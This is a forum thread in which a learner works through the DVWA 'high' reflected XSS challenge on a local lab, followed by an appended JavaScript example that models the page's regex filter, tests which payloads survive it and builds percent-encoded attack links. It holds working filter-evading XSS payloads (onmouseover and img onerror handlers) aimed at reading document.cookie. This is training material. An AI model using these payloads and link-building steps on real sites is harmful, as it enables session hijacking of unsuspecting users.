pierre Posted June 28, 2016 (edited)

Hello, I know my question is a little bit unclear. But with Firebug, I've found a potential XSS by adding a JavaScript instruction in an HTML field at URL 192.168.1.1/DVWA/vulnerabilities/xss_r/:

<a href='javascript:alert(document.cookie)'>Home</a>

The original field was:

<a href="../../.">Home</a>

My question would be: how does an attacker send a malicious link to a victim with a webpage modification included in the link?

Edited June 28, 2016 by tot94
digininja Posted June 28, 2016

Look at what gets sent to the server when you submit data, then look at how you can modify it as part of the attack. Rather than asking questions about every section of DVWA, have you considered doing an intro course? You'd learn a lot more. I'd recommend looking at stuff from SecurityTube.
pierre Posted June 28, 2016 (edited)

An intro course: have you got any URL? But in online videos, there is only attacker-server. For SQLi, it is fine, whereas in XSS or CSRF, the situation is victim-attacker-server, which is not present in online videos.

Edited June 28, 2016 by tot94
digininja Posted June 28, 2016

> An intro course: have you got any URL?

Search for SecurityTube.

> For SQLi, it is fine, whereas in XSS or CSRF, the situation is victim-attacker-server, which is not present in online videos.

XSS doesn't go through the attacker, it goes direct.
pierre Posted June 29, 2016

For reflected XSS, a link has to be sent to the victim. I haven't looked at stored XSS yet.
digininja Posted June 29, 2016

You said victim-attacker-server, but that isn't right for reflected XSS; that goes attacker-victim-server.
pierre Posted June 29, 2016

> 1 hour ago, digininja said: You said victim-attacker-server, but that isn't right for reflected XSS; that goes attacker-victim-server.

I was just quoting the different actors...
digininja Posted June 29, 2016

I'm now lost. What is your question again?
pierre Posted July 6, 2016 (edited)

I have already performed JavaScript injection by sending a malicious link to a victim like this:

http://192.168.1.1/DVWA/vulnerabilities/xss_r/?name=<script>alert(document.cookie);</script>

But here I need to get around the protection on the page by injecting JavaScript in HTML events like this:

<a href="javascript:alert(document.cookie)">Click me</a>

But I have to modify the HTML page code with Firebug. So I was wondering how I could send a link with JavaScript in an HTML event to a victim in order to steal cookies?

Edited July 6, 2016 by tot94
digininja Posted July 6, 2016

You would send them this and ask them to click on it:

http://192.168.1.1/DVWA/vulnerabilities/xss_r/?name=<script>alert(document.cookie);</script>

You don't modify anything.
pierre Posted July 11, 2016

No, here I can't because of this pattern:

/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i

It intercepts the <script> tag and replaces it with a space. So I have to bypass this hardening with HTML events, which is what I described above. But I don't know how to send the link with the HTML page modified. Am I more understandable?
digininja Posted July 11, 2016

I think you've misunderstood how reflected XSS works. At the DVWA level you send out a link that the user clicks on and that is it: it goes direct to the user, then direct to the site. If you are intercepting things then it isn't XSS. Which level are you trying to solve?
pierre Posted July 11, 2016

The HIGH level. I think I don't understand how XSS works along with HTML events.
digininja Posted July 11, 2016

Look at what the page is filtering:

$name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] );

Now look at this XSS cheat sheet and spot a way to send XSS that doesn't get caught by this regex check: https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet

Enter that into the field and see what happens. Now look at where you are and work out how you would get that to a user in a way they could click on it.
pierre Posted July 12, 2016

Yes, I've found the section able to bypass the hardening:

> Malformed A tags
> Skip the HREF attribute and get to the meat of the XXS... Submitted by David Cross ~ Verified on Chrome
> <a onmouseover="alert(document.cookie)">xxs link</a>
> or Chrome loves to replace missing quotes for you... if you ever get stuck just leave them off and Chrome will put them in the right place and fix your missing quotes on a URL or script.
> <a onmouseover=alert(document.cookie)>xxs link</a>

Thanks :)
digininja Posted July 12, 2016

Do you understand the concept now? You don't need to intercept things; all the interaction is between victim and site. Your job is to work out what to ask the victim to request.

For an attack string, my usual weapon of choice is

<img src="x" onerror="alert(1)" />

as it triggers without the user having to do anything.
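The following is an added example, not code from the thread or from DVWA itself. It models the filter quoted above in JavaScript, checks which of the payloads mentioned in the thread survive it, and shows the two halves of the reflected attack that digininja describes: the attacker building a URL, and the victim's browser sending that URL and receiving the reflected page. Assumptions, not stated on the page: the high-level page reflects the filtered value inside "<pre>Hello NAME</pre>", the base URL is the one the original poster used, and PHP's preg_replace with this pattern behaves like JavaScript String.replace with the same regex (in both, "." does not match a newline without the s flag, and the i flag makes the match case-insensitive). The function names are ours.

```javascript
// Added example (not from the thread or from DVWA): a model of the DVWA "high"
// reflected XSS filter, used to test payloads and to build the attacker's link.

// Assumed (not on the page): the URL the original poster was attacking.
const BASE_URL = 'http://192.168.1.1/DVWA/vulnerabilities/xss_r/';

// Same pattern as the PHP preg_replace quoted in the thread. The greedy (.*)
// groups only require the letters s, c, r, i, p, t to appear in that order
// somewhere after a "<", so "<script>", "<SCRIPT>" and "<scr<script>ipt>"
// are all removed. A tag whose letters do not contain that sequence survives.
const HIGH_FILTER = /<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i;

// Server side: what the high level does to the name parameter
// (PHP replaces with '', so the match is deleted, not replaced by a space).
function dvwaHighFilter(name) {
  return name.replace(HIGH_FILTER, '');
}

// Server side: the reflected page. The template is an assumption.
function renderReflectedPage(name) {
  return `<pre>Hello ${dvwaHighFilter(name)}</pre>`;
}

// A payload is only useful if the filter leaves it untouched.
function survivesFilter(payload) {
  return dvwaHighFilter(payload) === payload;
}

// Attacker side: the entire attack is a URL handed to the victim. The payload
// is percent-encoded so that spaces, quotes and angle brackets reach the server
// exactly as written instead of being mangled by the victim's browser or mail
// client.
function buildAttackUrl(payload) {
  return `${BASE_URL}?name=${encodeURIComponent(payload)}`;
}

// Victim side: the browser requests the link, the server decodes name= and
// reflects it back. Nothing passes through the attacker at this point.
function simulateVictimClick(url) {
  const name = new URL(url).searchParams.get('name');
  return renderReflectedPage(name);
}

// Rough check that the reflected HTML still carries an executable handler
// (good enough for these payloads; not a general HTML parser).
function containsEventHandler(html) {
  return /\son(?:error|mouseover|load)\s*=/i.test(html);
}

// Payloads discussed in the thread.
const SCRIPT_TAG = '<script>alert(document.cookie);</script>';
const EVENT_HANDLER = '<a onmouseover=alert(document.cookie)>xxs link</a>';
const IMG_ONERROR = '<img src="x" onerror="alert(1)" />';

// Stand-alone demo: which payloads get through, and what the victim sees.
for (const payload of [SCRIPT_TAG, EVENT_HANDLER, IMG_ONERROR]) {
  const url = buildAttackUrl(payload);
  console.log(`${survivesFilter(payload) ? 'SURVIVES' : 'BLOCKED '}  ${url}`);
  console.log(`  victim receives: ${simulateVictimClick(url)}`);
}
```

The <script> payload is reduced to a single ">" because the greedy groups stretch the match from the opening "<" to the final "t" of "</script>". The onmouseover and onerror payloads never contain the letters s, c, r, i, p, t in that order, so they are reflected verbatim, and the img variant fires on page load without any mouse movement. Whether alert(document.cookie) actually exposes the session cookie depends on the cookie lacking the HttpOnly flag; the thread does not say how the target is configured.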